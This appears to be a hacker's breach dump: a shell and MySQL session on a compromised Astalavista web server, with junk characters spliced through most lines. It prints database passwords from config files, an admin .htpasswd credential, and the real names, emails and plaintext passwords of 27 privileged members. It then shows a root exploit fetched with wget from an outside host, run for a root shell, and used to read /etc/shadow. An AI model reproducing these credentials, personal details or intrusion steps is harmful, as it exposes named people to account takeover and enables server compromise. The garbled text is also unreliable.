drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..3 V' _' h( t4 x# w- j- a
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
9 L& U3 _0 u- s, g6 j) v6 wdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql! X- e' A0 I/ e* c8 ]& X" t
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com. e) K, H; a' Q
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend& m1 x3 v4 h) _7 S
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner0 i" _% x E0 {2 f
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg& r, R7 @: v, p1 S7 X4 \1 @
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config+ R2 S" \% q C# x0 l( e
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
; ^7 T4 A* ~+ \" a- udrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd0 A& b: @9 G* H( O z6 X4 b3 {& N
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
2 X8 @3 |, D0 r) M2 S- r-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
0 S/ z: }: J9 R8 q* O+ M9 Ndrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
! n# f# i, U( h3 y' Adrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour# m8 W1 i( v/ t! A! V' K+ L- x
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
5 ? c' d6 @7 a-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
5 D* S2 y1 E; i" W8 v-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
- P; m P+ n& h! Q: G-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
; ~5 \" S J+ |) U) j+ d4 g0 o-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
t8 i. R2 r! }-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php; z0 r7 b1 q- n% |0 z0 h
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
6 I+ m' A, b: D. ` s; Hdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
9 r6 z" h; z- [4 l- V @drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang0 s8 z$ l* E2 r2 y$ {( L1 m
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib4 S% g8 p9 @) J8 @
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log" Y1 T l8 l* A5 Z
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member/ {) T- {1 W4 j* b
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
* j0 V2 k( l2 \! X: |) L% @* d2 |drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new- s! I* P7 z* y. b2 l9 C% Y
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf' h" B3 H) _, l# C m Y
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
/ j( [! f: N4 y$ u-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt; r" U$ G7 ?& d; ~ a. E
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss% s0 N% N6 W8 _% l* [( r/ j/ F; W
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
1 k2 T2 L& k* R: }/ ~drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
. U8 L4 E( w z; T3 N+ kdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
/ V- v8 O, X: p3 D6 U; Y5 vdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src' ~ ?/ B" Y. {/ ]: w- W
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
8 w7 w9 @4 e/ D9 l& I4 k9 Q$ odrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
9 J% G+ y6 F; y" r# Bdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old' G1 l! g) P+ ^) ?$ e, j. H
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php: L, r0 L# ^5 G8 V9 I9 {
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
: n; Z9 Y+ }+ [+ q% y
4 P# k$ m# M% i+ D9 @5 Y1 ]3 P, `sh-3.2$ head -20 index.php
+ c' ], Q$ I8 N0 a" _<?PHP
+ X1 f6 j- {4 e+ c' V& K, o/ w/**
* ?$ C8 w3 t+ X/ A% I* Mainfile (external) for astalavistaNET v2.0% w2 [2 _; @1 ^+ \" _
*
$ B. O7 \: w- h" W& b: k* @copyright Astalavista IT Engineering GmbH
* f- k2 \( m8 i7 P/ i) ?+ N6 w* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
8 U+ e( k. W! ~# h) e! I( p* @version 1.0
" y2 A8 ~2 H; e" h; f$ t0 A s' l, c*/
; g9 ~ K& ?* x& `6 j
4 U b) G8 t/ F4 R6 Z if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {/ T2 X. s& f* T6 m0 B6 U8 g
$dontStartSession = false;/ r8 ~7 g% d: \7 J" p4 y0 F
} else {0 a, s4 g) s# G5 N4 J/ F
$dontStartSession = true;- G n R: D0 C( M6 p4 e& u
}
: s: F0 n$ |$ z' X+ d8 e5 `' b0 K require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
5 d2 O- w; E' t/ N% q. t7 u, } require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);! c: ~1 C% i9 G9 ]' w8 P
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);9 c2 u, k( n6 L- [3 r
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
) L. A& G! K. R5 T: q# o, {
, n( O' j' ]" V. ?" ^sh-3.2$ cd config
7 P( ^0 U8 x1 V4 `3 ~$ V' i( a" Psh-3.2$ ls -la P- u0 D& Q0 Q [; M3 J
total 32
3 s' M) P8 [2 f" H% Bdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
4 b, M8 u: |; c0 w% }! c3 |( cdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .., A# J8 D' A/ h
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
: F( e% d, ~: p0 X-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
4 a M; b; q3 N4 F; W-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
. ~: R+ Z: C7 u1 K4 @9 j; J-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php, ^! p5 r3 i5 f; l8 A1 l
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
% Q. p3 C3 S6 ^ O4 J6 _! c [+ V8 u* O' i, h0 Y" M/ ^
sh-3.2$ cat com.conf.php
$ g7 C$ N/ q1 c4 g8 y5 h& y[snip]6 i- `$ V7 y& o0 f$ k* P7 [. j
//member-database
3 O/ O) C7 h: T H7 a, T4 @0 }% c$_CONFIG['db_mem_server'] = ‘localhost’;
3 S( q- O' _* N7 d! _8 l) W% D& Q$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;* _9 ~7 c e" y7 Q, I
$_CONFIG['db_mem_user'] = ‘astanet_db’;1 u- U, q4 `2 _1 x4 L8 q0 t
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;5 }' @8 l% I, S9 r9 d+ q
$_CONFIG['db_mem_debug'] = false; //true or false
& [/ u5 Z" O9 C' v" W3 d//ads-database
% M# ]0 `1 Y7 {. j3 W$_CONFIG['db_ads_server'] = ‘localhost’;
) l$ A$ W2 e* j3 M u! R$_CONFIG['db_ads_database'] = ‘astanet_ads’;
$ ]( P2 _, h+ v9 {' F- f$_CONFIG['db_ads_user'] = ‘astanet_db’;
9 H# ~2 J* c, P+ p' C* P$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
& P2 D3 j- P- n& {, z, `; R$_CONFIG['db_ads_debug'] = false; //true or false
7 \) \+ d- ^& {9 X3 t# g! p9 X( R//rainbow-database
" E8 F/ I. K) v- F4 Z* {7 _$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;$ T+ y% P _3 w" ~! l' m7 x
$_CONFIG['db_rainbow_database'] = ‘rainbow’;) k( i( s0 [* d0 B/ J
$_CONFIG['db_rainbow_user'] = ‘dinu’;
# @% t6 ?3 R4 K9 g$ H$_CONFIG['db_rainbow_password'] = ‘dinudinu’;- V/ t3 l! M$ e7 F/ \* h
$_CONFIG['db_rainbow_debug'] = false; //true or false
' t" ^* |9 o! v9 R" z6 v/ G0 M. V//mailing lists database
4 N4 q, ~" b) D( ~4 o# @' ]$_CONFIG['db_mailing_lists_server'] = ‘localhost’;" o: S; v1 F& n3 {7 l. {
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
6 z2 C8 c6 J; D" j# t, n$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
" A! Y b C7 N! q3 I$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
5 i/ m: P3 {7 A* D. L" `3 r$_CONFIG['db_mailing_lists_debug'] = false; //true or false* l4 r( E" ?9 p8 T1 r1 R/ Y5 [
//paypal
9 R; @0 l7 X9 `6 }% @3 W$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
* @: a K4 T8 `5 V z8 `$ Z5 B$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
% e' e4 u, f) i* ]1 |- w$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;( W' U: {3 u7 U. e# ?) w% q
$_CONFIG['sub_pp_noship'] = ‘1′;4 B+ `7 v: o4 j4 a3 m: [" k7 H! _% N2 M
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;# Q" s8 j& Y% T4 \4 U
[snip]
; i+ l; l0 w0 \1 b6 B* q
: I; y# H9 n9 l$ h7 O0 a Rsh-3.2$ cd ..7 a- T/ ^- \) E! [) Z
sh-3.2$ cd member
- B+ m# a8 V) L& ~# nsh-3.2$ ls -la
% j0 w" ^' m7 N8 qtotal 206 P7 g; v6 d% k y( F4 \ N8 f
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
3 u: t+ m$ G: t( [) Mdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
1 b. c* [. C; h( P-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
0 t+ W" n8 M; X+ ?-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
: ~+ b8 n! T* H! h$ ?& jsh-3.2$ cat .htaccess
1 f4 e3 n7 ^$ OSecFilterEngine off
, l: q5 E) k% w" z
: v( _! o2 h' r% V/ L# Gsh-3.2$ cd ..
, Q* t9 ^8 Q1 ?8 H0 F' Q& D7 fsh-3.2$ cd cron
! p3 N6 v' p; \4 O, b, a7 D8 D- Xsh-3.2$ ls -la% R# v$ M% V2 K8 u/ X
total 168
: a/ i( |, q: L" X. X5 A+ bdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
# y3 z H! \! e7 ydrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ../ c x# P. r* K" g6 B* z
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
9 E+ A; d7 i- Q-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php; E h- {8 ^8 N& N& ~) R5 S
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php2 k: q7 Z/ l9 V
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php+ j. {8 u. Q0 e8 r
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php6 a: _- \# ?! T. w2 K% }
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
; F3 o [' r$ L* s8 q) V% @: Z& F-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php# y6 `0 G8 J0 e& c7 H
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
}9 @4 e1 I* T2 m* s3 w7 K/ j-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh. [, |! [' d8 v! r3 m
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
' B8 P; @$ I* c) e, S-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
+ S/ M" V W2 V( v-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
7 M8 K" a0 f% i. Y6 ?-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh& i0 v! U7 y! m1 h" u
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php- o( i } @' b( J% J {6 } q! ^/ s
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
F5 E0 B, G- [2 @) T-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php2 w+ j5 P9 L* X7 T; x& f: S2 B
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php8 q' d1 X/ J# E7 \
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
. v9 q q8 U o o0 r3 Z; R& wdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email" @4 }0 V* x4 _, v: y3 v7 G
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php5 d0 Y# _0 D6 D$ B' n
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php6 W) \+ T' A! R2 c' ?5 B7 t
4 d; [4 ^0 n2 j4 _+ U: Q! tsh-3.2$ cd ..
: d* s2 `( B# @sh-3.2$ cd _007
0 d$ p# O" w- G" m rsh-3.2$ ls -la
; x9 e" c: o/ z5 }total 24' h7 X! r5 v0 d1 C
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
( |/ [" E# {. Ldrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..1 ^) t$ O/ t8 b( Q3 a8 F+ ~- B
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
6 V7 w% f O8 Z$ _ j* k, Z. o-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
7 \6 H$ k" U8 L-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
3 f& W' I) F( p/ _$ edrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap( }/ `, e/ H( J
7 a' ]; r" V5 R5 z0 Msh-3.2$ cat .htaccess
M0 ]# o2 [! _& Z# b& uauthType Basic2 I F$ m6 M! K! M% j
authName Admin. x! I% E3 U* s& e5 j& g$ x8 p
authUserFile /home/astanet/auth/.htadm_pwd
* x: d/ q$ Z+ x) Y# k% _. K3 trequire valid-user, L" g- u2 e/ J/ ]( l
8 Q4 {5 @* u7 L- B6 O; P5 K
sh-3.2$ cat /home/astanet/auth/.htadm_pwd; G& R" x$ c* Y8 k0 t4 h: a
admin2net:CR0bl65MwhfT9 a4 i3 u+ |( h5 B: m$ ^
8 s/ {' Q: z k2 |0 R9 r* Q8 R% jsh-3.2$ mysql -u astanet_db -p
7 [. J3 l7 N6 v+ DEnter password:
( W( v, S7 S+ d. V1 _0 YWelcome to the MySQL monitor. Commands end with ; or \g.
1 K! I1 |5 |* FYour MySQL connection id is 275153% k3 x3 o& i6 O( G; m/ Q3 B' f, U
Server version: 5.0.45-community-log MySQL Community Edition (GPL)- a! N: T# z1 h. C& S
: l9 D! ?5 w+ Y3 {1 _0 d' v! `% c5 ?Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer./ I2 e# k7 s0 Z* j; L
5 V2 x9 W X/ g8 K$ j* F8 S* S9 qmysql> show databases;
' u# z6 j% F, w- J. r+———————–+9 U; ?3 R! {8 a$ O
| Database |& n& g. f: x: G; s a
+———————–+
+ x0 P2 E! I9 z/ ^0 M( h4 O+ V* m0 H| information_schema |$ v D$ o" M( k1 p& N
| astanet_ads | ~4 k. L3 u4 I9 [; n8 b5 G7 b
| astanet_mailing_lists |
7 K7 k) Z1 G( d# N| astanet_mediawiki |
) K% J- W* a0 y8 ]! }) r2 S| astanet_membersystem |
3 I$ n! M# s( V+ E| test |' q% y% R2 @2 u9 j. G. Y# b: e
+———————–+" B4 s0 I/ ]# Y: ?4 @2 Q
6 rows in set (0.00 sec)% e! h* ]0 D% M$ V3 W, X( [) Z
3 K1 k% c7 i' S+ e% N
mysql> use astanet_membersystem7 O7 C3 b. n% |( ~) c
Database changed% h8 s; E- P2 {
mysql> show tables;: o) P3 J8 e* d4 S) {/ b {7 @
+———————————–+
. V! m+ M) h4 h% l- J| Tables_in_astanet_membersystem |
, C$ Q: F( s4 Z, Y1 t( Q+———————————–+( y: T* ?( f- j
| blacklist_categories |
7 O5 k9 d. `4 q; U& P| blacklist_content |* {$ z/ o0 C+ a. F k, I% C
| blacklist_levels |
4 n7 t9 B$ M% I- R* j5 M" ^4 _| blacklist_mcset |
6 o( K# E8 ~8 x! ]' X( S" F$ f+ P0 `. L| dir_categories |
6 b+ ?" W/ O5 S: I# e8 `| dir_comments |3 l1 w0 r$ c+ j3 G+ r: r) c5 l
| dir_links |
7 Q. C- p: R0 L4 O1 P, f9 q$ i| dir_temp |/ v0 w% b) k9 k# M1 C
| dir_votes |: i8 l$ r# ^. q' {" R4 @/ Z
| documents |
i' m- R3 R5 I& D1 v% F) W| documents_categories |
" ]! j; c: P5 F8 \| email_content |* X* b+ Z. E8 j% a- L/ ?
| email_settings |2 ~# G8 N! T/ {- J
| exploits |- D* P1 M/ v; }3 C0 z
| exploits_categories |
) c% i4 K7 Q& {+ V/ F| exploittree_categories |2 w P1 Q2 j1 [( `6 U
| exploittree_exploits |
0 {# n0 ]: L ~) f$ G% U% y W| home_values |8 M% C1 }( J4 T2 T' J; B) y( n) R! |2 x
| iso_countries |
- d/ h8 N2 U: D- h j6 T8 ^| links_categories |
6 E3 N; ^. G" G: p; A| links_records |
* i# v; [; A( h) ?& j1 B+ g| links_unauth |6 M$ v& t% y; \" T8 H- C
| links_votes |
% W! W) K0 ~1 u* D* q| log |
) u0 i3 _: h$ h9 M/ W| news_categories |# c& m' @1 p1 k# A- b7 H
| news_comments |
0 S- R: [8 c4 j% W1 m9 v| news_emoticons |
7 d% J3 N' y" w+ R$ y; n- L. a| news_latest |
0 J) e& w9 Y# i6 ^| news_messages |. z4 |5 Y: V- \/ x1 j6 T
| news_statistics |0 o a( S' @( `6 Q( ]3 O
| news_votes |
: a: y. r2 k. R| prices_content |9 J8 v. I% `- z" j
| prices_offers |$ j: Z6 g7 a$ d) U, X8 l
| rss_settings |+ ]! I1 U) v1 K. ]1 u4 h
| sessions |! b4 ]# S5 r$ k+ ~/ i$ @
| stats_signups |
5 U" r& F- ^0 R& J5 n7 `| u2u2 |0 p1 O, L! K) U, Z% O: X
| u2u_contact |
% e( Z: a3 ^0 I0 e" c* Z| u2u_settings |
5 w$ ]" ]8 M; K- H| user_keywords_selected_categories |0 h6 a7 X- [( C/ X
| users |4 a/ y2 m2 J0 O
| users_ipn_test |
0 O4 o# f% I6 w| users_keyword_values |
1 q' k1 o1 z" C. C$ |9 _2 n| users_profile |% l, s0 k& r$ s2 r8 w
| users_temp |- `0 i0 N4 r- D1 g3 v% ?
| users_upgrade |
9 s. s" _' n& I" A; I" x+———————————–+
. k- ?3 `* [; R' n |# J46 rows in set (0.00 sec)! O9 T5 c: p9 Y: H/ O
) T9 @. q4 ^$ U9 ]0 ]/ t: f% W
mysql> describe users;/ h) ?* F( H& {5 p0 ]+ J0 \6 w, I
+————————–+————————————–+——+—–+———————+—————-+
: ]1 M+ r! E5 S7 r0 e. ~! }| Field | Type | Null | Key | Default | Extra |- U6 X b& g5 D6 B1 J0 @
+————————–+————————————–+——+—–+———————+—————-+
* ^: i7 l- j8 b4 ]9 E7 e| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |* M- u: a9 D5 y; `3 O9 X' X& x
| user | varchar(50) | NO | | | |
0 G9 l H1 {3 D2 g0 Q( ~ n& b| nickname | varchar(30) | NO | MUL | anonymous | |3 o- u. t' u) Q3 ?
| password | varchar(30) | NO | | | |
" L+ D. ]: S' y% @| userlevel | tinyint(3) | YES | MUL | NULL | |
+ g2 ?; \$ C$ Z2 I* k4 }+ x| exp | int(8) unsigned | NO | | 0 | |
; B1 M! G+ B1 [( F$ e| email | varchar(50) | NO | | | |
5 e: R5 J( X X2 i6 s5 i| ip | varchar(15) | NO | | 0 | |
0 K/ O+ L5 l; n$ G" Q% p| proxy | set(’0′,’1′) | NO | | 0 | |
9 s: l2 |- W5 o+ v- Y| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |: Q( S! W0 T- N& ` y
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
4 K* M# z% k) E% f7 i9 L0 h1 H# t| anz_in | tinyint(1) | NO | | -1 | |
( r7 D; Y' E! s6 q! v; }* O% V$ }| status | tinyint(1) unsigned | NO | | 0 | |
8 \. f- a6 Z n. A4 ]| checked | set(’0′,’1′,’2′) | NO | | 0 | |
' t; G: C: e( K% I" v8 l! g B| freemember | set(’0′,’1′) | NO | | 0 | |' I/ r& K# x) S9 ~! P8 N0 |& K9 ^
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |# O4 n6 Y7 z0 E* L5 S' e
| lang | tinytext | NO | | | |
8 {) ^8 M' A6 ]5 m' ^8 L" ^; X| adid | smallint(6) | NO | | 0 | |0 @5 l: R) s6 l3 Z4 |6 M
| pp_txn_id | varchar(255) | YES | | NULL | |. Y5 a, ~/ u) {* L* z h" Q& G
| cnb_transaction_id | varchar(255) | YES | | NULL | |5 R/ K( s8 E- q9 p
| cnb_order_id | varchar(255) | YES | | NULL | |
5 \# T$ h# J T* o c$ ^| cnb_user_id | int(11) | YES | | 0 | |
0 {' \3 W: S+ O9 R* H$ j9 G+————————–+————————————–+——+—–+———————+—————-+- F$ n* ~: s) W+ C) [- ~% M( c2 u/ P- K
22 rows in set (0.01 sec)
6 F1 o; g) w k5 W# g; o4 K! J! K! Q l8 D
mysql> select count(*) as skids from users;- y) d2 T# O! Z( l& f- ?- U: t
+——-+; p# U0 ?# R0 {, O/ y7 e5 ?
| skids |
) p& [2 q9 _9 @+——-+
; B" h$ J6 G! Q0 O| 25199 |8 d/ Y p5 |4 ?& T; I. o& k4 _
+——-+
/ y9 d7 x6 y$ L! T0 H1 row in set (0.00 sec)
. g8 N2 n4 f, X( s+ P& E4 e `7 D, D. \
mysql> select user,nickname,password,email from users where userlevel = 1;$ v+ J# ?8 n9 M! k0 b
+————————–+———————-+——————+———————————–+$ g/ d- p; E* Y1 t# z, [3 G
| user | nickname | password | email |
6 e$ L# V( A9 d t+————————–+———————-+——————+———————————–+
8 ]# e2 H. D6 f1 y: `| pascal | prozac | astaman3 | 链接标记info@astalavista.net |/ @: m5 a) M+ X/ i$ U, o2 q
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
# C# b4 ], u+ ?' h) V' Y| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |0 e- c8 C8 L/ p1 N
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |$ `0 v( o% G# k; B# g2 F) M
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
0 ?- G" X+ X5 e) U8 V6 B! T| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
7 B8 S( I I1 {" o9 f| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
# [8 ?/ m. ^; L; @" I, s| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
/ D3 s" F5 a% T) {2 `| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |5 n3 s9 N1 j; O0 @. N% \
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |3 l9 J$ a/ R" B6 `, `3 @! E6 k
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |* W# N% ^ I1 r' ~
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |- c5 X6 F: d* j& x
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
; P# W. E; g( s| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
$ U2 E; f/ B* h, A$ R e s| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |2 d \! g2 D" `/ s G
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |4 O& \: r1 y; c! \/ i: S
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
% I$ l8 M7 `! k, O1 \; ?- }| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |( ~, e8 n) [' ]/ |3 D0 Y2 Z
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
4 G! L; C' ^/ u. A| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |; E2 m) O: N: W1 o' b1 ?
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |6 @% q g/ H) v, q3 ?. U6 h
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |4 Z8 I) x a7 C ^
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
+ |1 B3 X9 P3 l' p/ M& g| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
- s, `' c# {& H: B1 O2 t/ B) B" s| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |$ p6 x- p/ U5 e3 ]5 y# G
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
# @5 Y/ ~$ f( \* t# @( ?( b7 n| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
( K/ T7 `$ r7 b' l' R+————————–+———————-+——————+———————————–+
" E! |% s8 e2 T$ Y27 rows in set (0.00 sec)* \1 q. Z) u& {- E9 X* n8 B
) i* H! {$ K: N! m) s7 t
mysql> exit;$ l7 X* B% m* o* z
Bye
, Q d; B- m' I
& f7 P/ D# p, e. ^% J[~] plaintext passwords? yes,1 N; b2 ?. j8 p; Y9 p5 F; A
Those so called “security professionals” who charge you $6.66 / month to% O6 h( Y$ z& [+ o6 S3 y5 l+ d
register at their hack-proof portal, save your passwords in plaintext…
; R# h/ `4 {3 l ?1 y1 f3 v' W i. Hbrilliant!5 l6 s+ w% z( N4 D& D7 I* `
4 y% _/ L/ L0 M4 f; [ W
[~] This been fun but we want more.& j* h9 y/ F7 C% j7 Z$ q/ W
% l0 b2 _) T$ m+ p
sh-3.2$ uname -a
) D6 o8 J2 j9 q3 nLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
2 Y/ c) {% F8 s. U9 u! ^sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
# E( j N0 N0 I6 [: I& a; ^–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
T( I l; r5 l i( lResolving anti.sec.labs… 13.33.33.37
3 t! G; J' R2 K7 O/ G% J& lConnecting to anti.sec.labs|13.33.33.37|:80… connected.
9 K& J4 W+ b6 U; E, `; ?) Z3 m0 Z+ P) iHTTP request sent, awaiting response… 200 OK# B3 o9 c5 w( r5 y6 c0 X
Length: 18200 (18K) [text/plain]
0 J3 ?$ O8 q. J0 M k, eSaving to: `g0troot’
+ P3 n) R C/ c; c5 ~! F' S3 C8 z* g# P$ |6 [
100%[=========================================================================================================================================>] 18,200 58.6K/s in
6 k9 q3 W9 ^" n. U, J# s0.3s
) M* d. v1 y1 |4 {+ I$ x; @$ b! w
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]/ }# h% {5 t+ b
{( ~* j+ A9 E: W* W" q" \1 zsh-3.2$ ./g0troot -i x86_64
' `8 ?9 t, X0 S7 N7 |[+] g0troot - anti.sec.labs+ {* a/ K. f" o) r; E, E; A! i1 p* J
[+] Target: 2.6.18-128.1.10.el57 x* I% z/ F% Y: f# d
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
( i5 A4 h. D8 i+ R: o: N) h1 u' J4 b n
[+] r00tr00t
9 p0 U! k: ^3 e& h/ ^0 a[~] Executing shell…
2 w' P" W% O0 R, b% V4 T' V- h; V' p, A0 |- \# ]- i/ N* O r
sh-3.2# id" V& t0 o5 }! S( `6 k9 b# Z
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
2 R( w* L2 c) |7 A1 w; {7 N" ?4 ~! D' S4 h- K
sh-3.2# cat /etc/shadow
) r5 Y# x$ T! i, aroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::8 w3 V& f/ y( n- {& A. e
